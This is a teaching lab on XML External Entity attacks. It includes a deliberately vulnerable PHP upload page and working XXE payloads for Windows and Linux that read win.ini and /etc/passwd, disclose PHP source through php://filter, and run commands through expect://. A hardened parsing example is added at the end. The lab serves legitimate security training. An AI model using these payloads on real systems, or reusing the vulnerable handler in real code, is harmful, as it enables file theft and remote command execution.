Lab - XML eXternal Entity Attack


Prepare

Lab

Linux kali 3.14-kali1-686-pae

Requirements

# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5

Demo Code

<html>                       
<body>                       
<h1>Process XML</h1>         

<form action="" method="post" enctype="multipart/form-data">
    <label for="file">Archive XML:</label>        
    <input type="file" name="file" id="file">
    <input type="submit" name="submit" value="submit"><br />
</form>                      
<hr>                           
<h1>Results</h1>             
<?php
# error_reporting(E_ALL);
# ini_set("display_errors", 1);

if ( isset($_FILES["file"]) ) {
    // Intentionally vulnerable for this lab: the uploaded file is parsed
    // with DTD processing enabled and the node values are echoed unescaped.
    $doc = new DOMDocument();
    $doc->validateOnParse = true;
    $doc->load($_FILES["file"]["tmp_name"]);
    $tags = $doc->getElementsByTagName("data");
    foreach ($tags as $tag) {
        echo "<pre>" . $tag->nodeValue . "</pre>\n";
    }
} else {
    echo "invalid xml format";
}
?>

</body>                      
</html>

Exploit


Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
<xxx>&message;</xxx>

Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
<somexml><message>&hello;</message></somexml>

Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>
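
A hardened counterpart to the Demo Code handler, as an added example that is not part of the original lab: it parses the upload without entity substitution or DTD loading and refuses any document that carries a DOCTYPE. The helper name parse_untrusted_xml and the two sample strings are constructed for illustration, and the example assumes the upload format never needs a DTD.

```php
<?php
// Added example, not the lab's code. parse_untrusted_xml() is a hypothetical helper.
function parse_untrusted_xml(string $xml): DOMDocument
{
    // Before PHP 8.0 the linked libxml2 may resolve external entities by
    // default, so switch the entity loader off (deprecated from 8.0 on).
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    // No validateOnParse, LIBXML_NOENT or LIBXML_DTDLOAD: entities are not
    // substituted and no external DTD is read. LIBXML_NONET blocks network I/O.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new RuntimeException('malformed XML');
    }

    // Assumption: the upload format needs no DTD, so any DOCTYPE is refused.
    foreach ($doc->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new RuntimeException('DOCTYPE not allowed');
        }
    }
    return $doc;
}

// Constructed sample inputs, not real uploads.
$samples = [
    'plain'   => '<somexml><data>hello &amp; goodbye</data></somexml>',
    'doctype' => '<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///constructed/sample">]>'
               . '<somexml><data>&hello;</data></somexml>',
];

foreach ($samples as $name => $xml) {
    try {
        $doc = parse_untrusted_xml($xml);
        foreach ($doc->getElementsByTagName('data') as $tag) {
            // Escape before printing into HTML; the lab page echoes nodeValue raw.
            echo $name, ': ', htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8'), "\n";
        }
    } catch (RuntimeException $e) {
        echo $name, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

In the upload handler the helper would receive file_get_contents($_FILES["file"]["tmp_name"]); with the entity loader disabled on older PHP, DOMDocument::load() on a path fails, which is why the example parses a string.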

